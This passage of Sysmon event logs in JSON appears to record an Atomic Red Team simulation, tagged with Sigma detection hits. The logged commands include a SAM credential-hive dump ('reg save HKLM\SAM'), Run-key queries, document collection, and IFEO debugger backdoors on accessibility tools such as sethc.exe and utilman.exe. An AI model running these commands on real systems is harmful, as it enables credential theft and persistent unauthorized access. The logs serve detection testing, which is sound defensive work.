HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 